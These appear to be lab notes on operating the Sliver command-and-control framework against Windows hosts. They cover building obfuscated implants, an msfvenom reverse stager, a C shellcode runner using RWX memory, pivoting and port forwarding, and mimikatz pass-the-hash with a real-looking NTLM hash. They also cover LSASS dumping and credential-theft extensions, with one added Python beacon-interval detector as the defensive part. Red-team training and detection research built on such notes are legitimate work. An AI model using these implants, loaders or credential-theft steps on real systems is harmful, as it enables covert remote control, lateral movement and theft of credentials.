Sliver
Last updated
sudo apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64
curl https://sliver.sh/install|sudo bash
systemctl start sliver
systemctl status sliver
Configure authentication and start the client
└─$ sliver
Connecting to localhost:31337 ...
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain dash
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver >
In Sliver, the C2 agent is called an implant.
Sliver supports two implant modes: beacons and sessions.
Reference: https://sliver.sh/docs?name=Getting+Started
Sliver implants in v1.5 and later support two modes of operation: "beacon mode" and "session mode." Beacon mode implements an asynchronous communication style where the implant periodically checks in with the server, retrieves tasks, executes them, and returns the results. In "session mode" the implant will create an interactive real time session using either a persistent connection or using long polling depending on the underlying C2 protocol.
Put simply, beacon mode works like a Cobalt Strike beacon, while session mode works like Metasploit.
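From the defender's side, the difference between the two modes is what shows up on the wire: a beacon produces a train of short connections with a fairly regular inter-arrival time (the interval plus some jitter, like the `--seconds 5 --jitter 3` build later in these notes), while a session keeps one long-lived connection open. The following script is an added example, not part of these notes or of Sliver itself; it scores connection records by the regularity of their inter-arrival times, using the median absolute deviation of the intervals relative to their median so that bounded jitter still passes. The Zeek-style fields, the sample records and the thresholds are all assumptions.

```python
"""Beacon-interval detection over constructed connection records.

Added example (not from the original notes or from Sliver). Assumes
Zeek-style conn.log fields (ts, id.orig_h, id.resp_h, id.resp_p); the
sample data and thresholds below are constructed assumptions.
"""
import statistics
from collections import defaultdict

MIN_CONNECTIONS = 8   # fewer check-ins than this is not enough evidence
MAX_MAD_RATIO = 0.5   # MAD(intervals) / median(intervals) above this is too irregular


def interval_stats(timestamps):
    """Return (median_interval, mad_ratio, n_intervals) for a set of timestamps.

    mad_ratio is the median absolute deviation of the inter-arrival times divided
    by their median: near 0 for a fixed interval, small for a jittered beacon,
    large for human-driven traffic.
    """
    ts = sorted(timestamps)
    deltas = [b - a for a, b in zip(ts, ts[1:])]
    if len(deltas) < 2:
        return None
    med = statistics.median(deltas)
    if med <= 0:
        return None
    mad = statistics.median(abs(d - med) for d in deltas)
    return med, mad / med, len(deltas)


def beacon_candidates(records, min_connections=MIN_CONNECTIONS,
                      max_mad_ratio=MAX_MAD_RATIO):
    """Group records by (src, dst, dport) and return the flows whose timing
    looks like a check-in schedule."""
    flows = defaultdict(list)
    for ts, src, dst, dport in records:
        flows[(src, dst, dport)].append(ts)
    hits = []
    for key, stamps in flows.items():
        if len(stamps) < min_connections:
            continue
        stats = interval_stats(stamps)
        if stats is None:
            continue
        med, ratio, _ = stats
        if ratio <= max_mad_ratio:
            hits.append({"flow": key, "median_interval": med,
                         "mad_ratio": ratio, "connections": len(stamps)})
    return hits


def build_sample():
    """Constructed records: one jittered beacon flow and one irregular, human-like flow."""
    records = []
    t = 1000.0
    records.append((t, "192.168.179.11", "192.168.179.132", 8888))
    for d in [5, 7, 3, 6, 4, 8, 5, 2, 6, 5]:          # 5 s interval, up to 3 s jitter
        t += d
        records.append((t, "192.168.179.11", "192.168.179.132", 8888))
    t = 1000.0
    records.append((t, "192.168.179.20", "203.0.113.10", 443))
    for d in [1, 40, 3, 120, 2, 300, 15, 60, 1, 500]:  # browsing-like, no schedule
        t += d
        records.append((t, "192.168.179.20", "203.0.113.10", 443))
    return records


if __name__ == "__main__":
    for hit in beacon_candidates(build_sample()):
        print(hit)
```

A session-mode implant will not trigger this: it holds a single connection open, so the complementary check is a long-lived connection to an uncommon external port. Both checks need a baseline, since software updaters and monitoring agents also check in on a schedule.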
sliver > generate --mtls <C2 server ip> --os windows --arch amd64 --format exe --save /tmp/shell.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 44s
[*] Implant saved to /tmp/shell.exe
Start the mTLS listener
sliver > mtls
[*] Starting mTLS listener ...
[*] Successfully started job #1
sliver > jobs
ID Name Protocol Port Stage Profile
==== ====== ========== ====== ===============
1 mtls tcp 8888
sliver >
Interacting with sessions
[*] Session bb86e5a5 DIGITAL_ATTENTION - 192.168.179.11:59818 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 22:59:29 EST
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== =================== =========== ====================== ================== ========================= ================== ======== ======================================== =========
bb86e5a5 DIGITAL_ATTENTION mtls 192.168.179.11:59818 DomainController ENDY-COMP\administrator windows/amd64 en-US Sat Dec 21 22:59:29 EST 2024 (23s ago) [ALIVE]
sliver > use
? Select a session or beacon: SESSION bb86e5a5 DIGITAL_ATTENTION 192.168.179.11:59818 DomainController ENDY-COMP\administrator windows/amd64
[*] Active session DIGITAL_ATTENTION (bb86e5a5-82e0-4562-80db-02dab7f3e0d9)
sliver (DIGITAL_ATTENTION) > info
Session ID: bb86e5a5-82e0-4562-80db-02dab7f3e0d9
Name: DIGITAL_ATTENTION
Hostname: DomainController
UUID: 6d114d56-3846-0706-4bad-06bcafa25169
Username: ENDY-COMP\administrator
UID: S-1-5-21-3689512688-2841538555-566222747-500
GID: S-1-5-21-3689512688-2841538555-566222747-513
PID: 5468
OS: windows
Version: Server 2016 build 14393 x86_64
Locale: en-US
Arch: amd64
Active C2: mtls://192.168.179.132:8888
Remote Address: 192.168.179.11:59818
Proxy URL:
Reconnect Interval: 1m0s
First Contact: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)
Last Checkin: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)
Leave the session (background it)
sliver (DIGITAL_ATTENTION) > background
[*] Background ...
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== =================== =========== ====================== ================== ========================= ================== ======== ========================================= =========
75da56b4 DIGITAL_ATTENTION mtls 192.168.179.11:59853 DomainController ENDY-COMP\administrator windows/amd64 en-US Sat Dec 21 23:03:57 EST 2024 (1m4s ago) [ALIVE]
sliver > sessions -k 75da56b4
[!] Lost session 75da56b4 DIGITAL_ATTENTION - 192.168.179.11:59853 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:05:21 EST
sliver >
sliver > generate beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --save /tmp/beacon.exe --seconds 5 --jitter 3
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 29s
[*] Implant saved to /tmp/beacon.exe
Interacting with beacons
[*] Beacon be2fe170 DETERMINED_JUNKET - 192.168.179.11:59885 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:10:34 EST
sliver > beacons
ID Name Tasks Transport Remote Address Hostname Username Operating System Locale Last Check-In Next Check-In
========== =================== ======= =========== ====================== ================== ========================= ================== ======== ======================================= ======================================
be2fe170 DETERMINED_JUNKET 0/0 mtls 192.168.179.11:59885 DomainController ENDY-COMP\administrator windows/amd64 en-US Sat Dec 21 23:10:47 EST 2024 (3s ago) Sat Dec 21 23:10:52 EST 2024 (in 2s)
sliver > use
? Select a session or beacon: BEACON be2fe170 DETERMINED_JUNKET 192.168.179.11:59885 DomainController ENDY-COMP\administrator windows/amd64
[*] Active beacon DETERMINED_JUNKET (be2fe170-f919-47fe-8c3d-9ed9fb54ee99)
sliver (DETERMINED_JUNKET) > info
Beacon ID: be2fe170-f919-47fe-8c3d-9ed9fb54ee99
Name: DETERMINED_JUNKET
Hostname: DomainController
UUID: 6d114d56-3846-0706-4bad-06bcafa25169
Username: ENDY-COMP\administrator
UID: S-1-5-21-3689512688-2841538555-566222747-500
GID: S-1-5-21-3689512688-2841538555-566222747-513
PID: 5484
OS: windows
Version: Server 2016 build 14393 x86_64
Locale: en-US
Arch: amd64
Active C2: mtls://192.168.179.132:8888
Remote Address: 192.168.179.11:59885
Proxy URL:
Interval: 5s
Jitter: 3s
First Contact: Sat Dec 21 23:10:34 EST 2024 (24s ago)
Last Checkin: Sat Dec 21 23:10:53 EST 2024 (5s ago)
Next Checkin: Sat Dec 21 23:10:58 EST 2024 (0s ago)
sliver (DETERMINED_JUNKET) >
Check the queued tasks
sliver (DETERMINED_JUNKET) > tasks
ID State Message Type Created Sent Completed
========== =========== ============== =============================== =============================== ===============================
2b2aec2f completed Screenshot Sat, 21 Dec 2024 23:12:08 EST Sat, 21 Dec 2024 23:12:12 EST Sat, 21 Dec 2024 23:12:12 EST
9ecc207b completed Execute Sat, 21 Dec 2024 23:12:04 EST Sat, 21 Dec 2024 23:12:06 EST Sat, 21 Dec 2024 23:12:06 EST
Change the beacon config (interval and jitter)
sliver (DETERMINED_JUNKET) > reconfig -i 5s -j 1s
[*] Tasked beacon DETERMINED_JUNKET (428cea99)
[+] DETERMINED_JUNKET completed task 428cea99
[*] Reconfigured beacon
Convert a beacon into a session
sliver (DETERMINED_JUNKET) > interactive
[*] Using beacon's active C2 endpoint: mtls://192.168.179.132:8888
[*] Tasked beacon DETERMINED_JUNKET (51e7cb02)
[*] Session caee6edb DETERMINED_JUNKET - 192.168.179.11:59967 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:17:21 EST
sliver (DETERMINED_JUNKET) >
The session can also be opened over a different protocol
sliver > interactive --help
Task a beacon to open an interactive session (Beacon only)
Usage:
======
interactive [flags]
Flags:
======
-d, --delay string delay opening the session (after checkin) for a given period of time (default: 0s)
-n, --dns string dns connection strings
-h, --help display help
-b, --http string http(s) connection strings
-m, --mtls string mtls connection strings
-p, --named-pipe string namedpipe connection strings
-i, --tcp-pivot string tcppivot connection strings
-t, --timeout int command timeout in seconds (default: 60)
-g, --wg string wg connection strings
Beacons can be converted into sessions, but sessions cannot be converted into beacons.
Some commands, such as shell and portfwd, only work with sessions.
Create profiles so that generating implants is faster
Session profile
sliver > profiles new --mtls 192.168.179.132 --os windows --arch amd64 --format exe session_win_default
[*] Saved new implant profile session_win_default
sliver > profiles
Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations
===================== ============== =============== ================================= ======= ============ ============= =============
session_win_default session windows/amd64 [1] mtls://192.168.179.132:8888 false EXECUTABLE enabled
sliver > profiles generate --save /tmp/shell.exe session_win_default
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 24s
[*] Implant saved to /tmp/shell.exe
Beacon profile
sliver > profiles new beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 beacon_win_default
[*] Saved new implant profile (beacon) beacon_win_default
sliver > profiles
Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations
===================== ============== =============== ================================= ======= ============ ============= =============
beacon_win_default beacon windows/amd64 [1] mtls://192.168.179.132:8888 false EXECUTABLE enabled
session_win_default session windows/amd64 [1] mtls://192.168.179.132:8888 false EXECUTABLE enabled
sliver > profiles generate --save /tmp/beacon.exe beacon_win_default
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 26s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/beacon.exe
List the implant builds
sliver > implants
Name Implant Type Template OS/Arch Format Command & Control Debug
=================== ============== ========== =============== ============ ================================= =======
DETERMINED_JUNKET beacon sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false
DIGITAL_ATTENTION session sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false
EASY_BROOM session sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false
FRESH_AUDIENCE beacon sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false
TALL_POST beacon sliver windows/amd64 EXECUTABLE [1] mtls://192.168.122.111:8888 false
Remove an implant build
sliver > implants rm TALL_POST
? Remove 'TALL_POST' build? Yes
To create a stager, first create a profile with the shellcode format
sliver > profiles new --http 192.168.179.132 --format shellcode win-shellcode
[*] Saved new implant profile win-shellcode
Create a listener
sliver > https
[*] Starting HTTPS :443 listener ...
[*] Successfully started job #1
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== ===============
1 https tcp 443
Create a stage-listener for the profile to deliver the payload. Remember to add --prepend-size
sliver > stage-listener --url http://192.168.179.132:1234 --profile win-shellcode --prepend-size
[*] No builds found for profile win-shellcode, generating a new one
[*] Sliver name for profile win-shellcode: UNNECESSARY_DICTAPHONE
[*] Job 8 (http) started
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== =====================================================
7 https tcp 443
8 http tcp 1234 win-shellcode (Sliver name: UNNECESSARY_DICTAPHONE)
Generate a payload that loads the stager with msfvenom. Note: use the custom shell payload; with meterpreter it does not work.
msfvenom --payload windows/x64/custom/reverse_winhttp LHOST=192.168.179.132 LPORT=1234 LURI=/hello.woff --format exe --out /tmp/stager.exe
Alternatively, generate the payload in C format and load it with the following code
#include <windows.h>
#include <string.h>
int main()
{
// Stager bytes from msfvenom --format c (truncated here, as in the original notes)
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
...
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff"
"\xd5";
// Commit an RWX region, copy the bytes in and jump to them; a private RWX
// allocation followed by a call into it is exactly what memory scanners look for
void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (exec == NULL)
return 1;
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();
return 0;
}
Compile it
x86_64-w64-mingw32-gcc -o shellrunner.exe shellrunner.c
After launching the file, wait 5-10 s for the session to come back (sometimes the session arrives without an alert, so run sessions to check).
Sliver can execute .NET assemblies, similar to Cobalt Strike.
sliver (BROKEN_LIQUID) > execute-assembly /home/kali/tools/Ghostpack-CompiledBinaries/Seatbelt.exe
[*] Output:
%&&@@@&&
&&&&&&&%%%, #&&@@@@@@%%%%%%###############%
&%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((#####
###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((#####
#####%###################### %%%.. @////(((&%%%%%%%################
&%& %%%%% Seatbelt %////(((&%%%%%%%%#############*
&%%&&&%%%%% v1.2.1 ,(((&%%%%%%%%%%%%%%%%%,
#%%%%##,
ERROR: Error running command ""
[*] Completed collection in 0.006 seconds
sliver (BROKEN_LIQUID) > socks5 --help
In-band SOCKS5 Proxy
Usage:
======
socks5 [flags]
Flags:
======
-h, --help display help
-t, --timeout int router timeout in seconds (default: 60)
Sub Commands:
=============
start Start an in-band SOCKS5 proxy
stop Stop a SOCKS5 proxy
sliver (BROKEN_LIQUID) > socks5 start
[*] Started SOCKS5 127.0.0.1 1081
⚠ In-band SOCKS proxies can be a little unstable depending on protocol
sliver (BROKEN_LIQUID) > socks5
ID Session ID Bind Address Username Passwords
==== ====================================== ================ ========== ===========
1 762b70da-f0db-4d20-ada9-a155f4a1ce7d 127.0.0.1:1081
sliver (BROKEN_LIQUID) > socks5 stop -i 1
[*] Removed socks5
sliver (BROKEN_LIQUID) >
In my experience, its stability is not as good as Cobalt Strike's.
sliver (SPICY_JAW) > portfwd --help
In-band TCP port forwarding
Usage:
======
portfwd [flags]
Flags:
======
-h, --help display help
-t, --timeout int command timeout in seconds (default: 60)
Sub Commands:
=============
add Create a new port forwarding tunnel
rm Remove a port forwarding tunnel
sliver (SPICY_JAW) > portfwd add -b 127.0.0.1:9999 -r 192.168.17.138:445
[*] Port forwarding 127.0.0.1:9999 -> 192.168.17.138:445
This binds local port 9999 to port 445 on 192.168.17.138
Remove the port forward
sliver (SPICY_JAW) > portfwd
ID Session ID Bind Address Remote Address
==== ====================================== ================ ====================
1 b0653816-faa9-4975-b28b-92165d4a6085 127.0.0.1:9999 192.168.17.138:445
sliver (SPICY_JAW) > portfwd rm -i 1
[*] Removed portfwd
Pivots only work with sessions, not with beacons.
Create a TCP pivot on a session
sliver (BROKEN_LIQUID) > pivots tcp
[*] Started tcp pivot listener :9898 with id 1
sliver (BROKEN_LIQUID) > pivots
ID Protocol Bind Address Number Of Pivots
==== ========== ============== ==================
1 TCP :9898 0
sliver (BROKEN_LIQUID) >
Generate an implant that calls back to the C2 through the pivot
sliver > generate --tcp-pivot 192.168.17.137:9898 --os windows --arch amd64 --format exe --save /tmp/pivot.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 30s
[*] Implant saved to /tmp/pivot.exe
The IP here is the IP of the session host that can reach the target.
Upload it to the target and run it; the new session arrives through the TCP tunnel.
Start a named-pipe pivot on a session
sliver > use 982155fd
[*] Active session BROKEN_LIQUID (982155fd-407a-434b-8686-e4af57c1f295)
sliver (BROKEN_LIQUID) > pivots named-pipe --bind foobar
[*] Started named pipe pivot listener \\.\pipe\foobar with id 2
Generate an implant that calls back to the C2 through the named pipe
sliver > generate --named-pipe 192.168.17.137/pipe/foobar --os windows --arch amd64 --format exe --save /tmp/pivot.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 34s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/pivot.exe
As above, the IP is the IP of the session host that can reach the target.
Result:
Stop the pivot
sliver (BROKEN_LIQUID) > pivots stop -i 1
[*] Stopped pivot listener
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ================== =========== ======================= ========== ========================= ================== ======== ======================================= =========
0456ae36 BEAUTIFUL_REPORT http(s) 192.168.179.137:49870 WinA ENDY-COMP\administrator windows/amd64 en-US Sat Jan 4 22:50:55 EST 2025 (2s ago) [ALIVE]
sliver > use 0456ae36
[*] Active session BEAUTIFUL_REPORT (0456ae36-c402-45b7-b111-8f83916b3048)
sliver (BEAUTIFUL_REPORT) > rename -n WinA
[*] Renamed implant to WinA
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ====== =========== ======================= ========== ========================= ================== ======== ======================================= =========
0456ae36 WinA http(s) 192.168.179.137:49870 WinA ENDY-COMP\administrator windows/amd64 en-US Sat Jan 4 23:06:52 EST 2025 (1s ago) [ALIVE]
sliver >
sliver (WinA) > download desktop.ini /home/kali/test
[*] Wrote 282 bytes (1 file successfully, 0 files unsuccessfully) to /home/kali/test
sliver (WinA) > upload /home/kali/test test
[*] Wrote file to C:\Users\Administrator\Desktop\test
sliver (BEAUTIFUL_REPORT) > shell
? This action is bad OPSEC, are you an adult? Yes
[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...
[*] Started remote shell with pid 2844
PS C:\Users\Administrator\Desktop> Shell exited
sliver (BEAUTIFUL_REPORT) >
Press Ctrl+D to exit the shell.
sliver (WinA) > execute -o whoami /all
[*] Output:
USER INFORMATION
----------------
User Name SID
================== ===========================================
wina\administrator S-1-5-21-2122276757-511757396-437061769-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
sliver (WinA) > ls \\\\192.168.17.138\\Share
\\192.168.17.138\ (0 items, 0 B)
================================
sliver (WinA) > make-token -u userB -p Password123 -d .
[*] Successfully impersonated .\userB. Use `rev2self` to revert to your previous token.
sliver (WinA) > ls \\\\192.168.17.138\\Share
\\192.168.17.138\Share\ (1 item, 0 B)
=====================================
-rw-rw-rw- 123.txt 0 B Sat Jan 04 21:48:13 -0800 2025
sliver (WinA) >
Use rev2self to drop the token.
sliver (LOVELY_STAR) > upload /home/kali/tools/mimikatz/x64/mimikatz.exe mimikatz.exe
[*] Wrote file to C:\Users\Administrator\Desktop\mimikatz.exe
sliver (LOVELY_STAR) > execute -o mimikatz.exe "privilege::debug" "sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:\"powershell -w hidden\"" "exit"
[*] Output:
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:"powershell -w hidden"
user : userB
domain : .
program : powershell -w hidden
impers. : no
NTLM : 58a478135a93ac3bf058a5ea0e8fdb71
| PID 3048
| TID 1900
| LSA Process is now R/W
| LUID 0 ; 2745069 (00000000:0029e2ed)
\_ msv1_0 - data copy @ 000001E1308E1CF0 : OK !
\_ kerberos - data copy @ 000001E12FD0DB98
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001E12FD3A208 (32) -> null
mimikatz(commandline) # exit
Bye!
sliver (WinA) > procdump --pid 672 --save lsass.dmp
[*] Process dump stored in: lsass.dmp
Parse the LSASS minidump with pypykatz
┌──(kali㉿kali)-[~]
└─$ pypykatz lsa minidump lsass.dmp
INFO:pypykatz:Parsing file lsass.dmp
FILE: ======== lsass.dmp =======
== LogonSession ==
authentication_id 113459 (1bb33)
session_id 0
username ANONYMOUS LOGON
domainname NT AUTHORITY
logon_server
logon_time 2025-01-05T07:49:38.007112+00:00
sid S-1-5-7
luid 113459
....
sliver (WinA) > sideload /home/kali/tools/mimikatz/x64/mimikatz.exe "privilege::debug" "exit"
[*] Output:
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # exit
Bye!
Armory is Sliver's extension package manager, which lets us download additional packages
sliver > armory
Install a package
sliver > armory install windows-credentials
[*] Installing extension 'coff-loader' (v1.0.14) ... done!
[*] Installing extension 'nanodump' (v0.0.5) ... done!
[*] Installing extension 'credman' (v1.0.7) ... done!
[*] Installing extension 'chromiumkeydump' (v0.0.2) ... done!
[*] Installing extension 'handlekatz' (v0.0.1) ... done!
[*] Installing extension 'mimikatz' (v0.0.1) ... done!